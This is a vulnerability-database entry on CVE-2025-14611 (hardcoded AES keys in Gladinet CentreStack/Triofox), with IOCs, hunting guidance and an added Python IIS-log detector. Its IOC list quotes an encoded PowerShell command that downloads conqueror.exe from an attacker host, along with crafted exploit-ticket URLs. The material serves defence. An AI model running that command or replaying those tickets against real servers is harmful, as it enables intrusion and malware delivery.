cbcvebase.
CVE-2025-14611
published 2025-12-12

Priority: P1 (96) · critical 9.8 · CVSS 3.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Badges: KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability, due 2026-01-05
Exploited in the wild
EPSS: 50.95% (98.8th percentile)
Gladinet CentreStack and Triofox prior to version 16.12.10420.56791 used hardcoded values for their implementation of the AES cryptoscheme. This degrades security for publicly exposed endpoints that may make use of it and may offer arbitrary local file inclusion when provided a specially crafted request without authentication. This opens the door for future exploitation and can be leveraged with previous vulnerabilities to gain a full system compromise.

Affected (3 ranges)

Vendor    Product                    Version range          Fixed in
gladinet  centrestack                < 16.12.10420.56791    16.12.10420.56791
gladinet  centrestack_and_triofox    < 16.12.10420.56791    16.12.10420.56791
gladinet  triofox                    < 16.12.10420.56791    16.12.10420.56791

Detection & IOCs (extracted from sources)

ip: 147.124.216.205
ip: 185.196.11.207
ip: 146.70.134.50
url: http://185.196.11.207:8000/conqueror.exe
hash: e9fa82d92d826c6a1c38165fe6bd610d3b80cd5d53ec65ac3fe94393be64b5a5
filename: conqueror.exe
path: C:\Users\Public\conqueror.exe
path: C:\Program Files (x86)\Gladinet Cloud Enterprise\root\web.config
url: /storage/filesvr.dn t=vghpI7EToZUDIZDdprSubL3mTZ2:aCLI:8Zra5AOPvX4TEEXlZiueqNysfRx7Dsd3P5l6eiYyDiG8Lvm0o41m:ZDplEYEsO5ksZajiXcsumkDyUgpV5VLxL%7C372varAu
url: /storage/filesvr.dn t=vghpI7EToZUDIZDdprSubL3mTZ2:aCLI:8Zra5AOPvX4TEEXlZiueqNysfRx7Dsd3P5l6eiYyDiG8Lvm0o41m:ZDplEYEsO5ksZajiXcsukOQzFIwOzIHswJBdS7w0RY
url: /storage/filesvr.dn t=t=vghpI7EToZUDIZDdprSubL3mTZ2:aCLI:8Zra5AOPvX4TEEXlZiueqNysfRx7Dsd3P5l6eiYyDiG8Lvm0o41m4mxEjYeJuI6Nk:xBHQQ1c6Hzjx3OsG4T044CP5qZ9Qr
command: "C:\Windows\System32\cmd.exe" /c powershell -e SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcAA6AC8ALwAxADgANQAuADEAOQA2AC4AMQAxAC4AMgAwADcAOgA4ADAAMAAwAC8AYwBvAG4AcQB1AGUAcgBvAHIALgBlAHgAZQAgAC0ATwB1AHQARgBpAGwAZQAgAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwAYwBvAG4AcQB1AGUAcgBvAHIALgBlAHgAZQA=
yara (regex): 'decryptionKey="([A-Fa-f0-9]+)"'
  • Hunt for requests to /storage/filesvr.dn with a `t` query parameter in IIS logs; this is the vulnerable HTTP handler endpoint. Tickets with a timestamp of year 9999 indicate a crafted never-expiring exploit ticket.
  • Look for Windows Application Event Log Event ID 1316 to identify ViewState deserialization exploitation attempts; the event captures the encoded payload and source IP.
  • Audit file access logs for unauthorized reads of web.config, particularly at C:\Program Files (x86)\Gladinet Cloud Enterprise\root\web.config, which contains machine keys used for ViewState deserialization attacks.
  • Review Access Tickets for year 9999 timestamps in the `t` parameter of filesvr.dn requests as a high-fidelity indicator of exploitation.
  • The exploit ticket's `t` parameter uses URL-safe character substitution (`:` replaces `+`, `|` replaces `/`) before Base64 decoding; detection rules should account for this encoding when parsing IIS logs.
  • Check for web.config exfiltration attempts and rotate all stored credentials and API keys if web.config access is confirmed.
  • The Username and Password fields in observed exploit tickets were left blank. When empty strings are passed, impersonation logic may fail and fall back to the IIS Application Pool Identity, meaning exploitation does not require valid credentials.
  • Attribution to the cl0p ransomware group for the December 15 incidents is unconfirmed at time of reporting; treat the associated IPs and conqueror.exe payload as high-confidence IOCs but actor attribution as tentative.
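Detection logic for the IIS-log hunt described in the bullets above, written here as an added example (not code from the original page or from Gladinet): it picks out requests to /storage/filesvr.dn that carry a `t` ticket, reverses the percent-encoding and the `:`/`|` substitution before Base64-decoding, and flags source IPs that appear in the IOC list. The log field order and the sample lines are constructed; the decoded bytes are kept opaque because the page gives no plaintext layout for the ticket, so the year-9999 timestamp check is left to a decryption step this example does not attempt.

```python
import base64
from urllib.parse import unquote

# Constructed IIS W3C-style log lines (not from the original report); the field
# order date time c-ip cs-method cs-uri-stem cs-uri-query sc-status is assumed.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2025-12-15 03:14:07 10.0.0.5 GET /storage/t.dn id=1 200
2025-12-15 03:14:09 185.196.11.207 GET /storage/filesvr.dn t=AAEC:%7C:%7CAwQ 200
2025-12-15 03:14:11 203.0.113.9 GET /storage/filesvr.dn t=not%20base64!! 500
2025-12-15 03:15:00 10.0.0.7 GET /storage/filesvr.dn - 200
"""

# Source IPs listed in the IOC section above.
IOC_IPS = {"147.124.216.205", "185.196.11.207", "146.70.134.50"}

def normalize_ticket(raw: str):
    """URL-decode the `t` value, undo the URL-safe substitution (':' stands for
    '+', '|' for '/'), restore padding and Base64-decode; None if undecodable."""
    # unquote(), not unquote_plus(): a '+' must never be turned into a space here.
    s = unquote(raw).replace(":", "+").replace("|", "/")
    s += "=" * (-len(s) % 4)
    try:
        return base64.b64decode(s, validate=True)
    except ValueError:  # binascii.Error is a ValueError
        return None

def hunt_filesvr_tickets(log_text: str) -> list:
    """One finding per request to /storage/filesvr.dn that carries a `t` ticket.
    The decoded bytes are treated as opaque; only their length is recorded."""
    findings = []
    for line in log_text.splitlines():
        parts = line.split()
        if not parts or parts[0].startswith("#") or len(parts) < 6:
            continue
        date, time_, c_ip, _method, stem, query = parts[:6]
        if stem.lower() != "/storage/filesvr.dn" or query == "-":
            continue
        # Split the query by hand so the raw (still percent-encoded) value is kept.
        raw_t = next((kv[2:] for kv in query.split("&") if kv.startswith("t=")), None)
        if raw_t is None:
            continue
        ticket = normalize_ticket(raw_t)
        findings.append({
            "when": f"{date} {time_}",
            "c_ip": c_ip,
            "ioc_ip": c_ip in IOC_IPS,
            "ticket_len": None if ticket is None else len(ticket),
        })
    return findings
```

A ticket that fails to decode after normalization is still reported, since a malformed `t` value on this endpoint is itself worth a look.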

CVSS provenance

Source     Version  Score  Severity  Vector
nvd        v3.1     9.8    CRITICAL  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd        v4.0     7.1    HIGH      CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:H/SI:H/SA:H/E:A/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck           7.1    HIGH
cisa                7.1    HIGH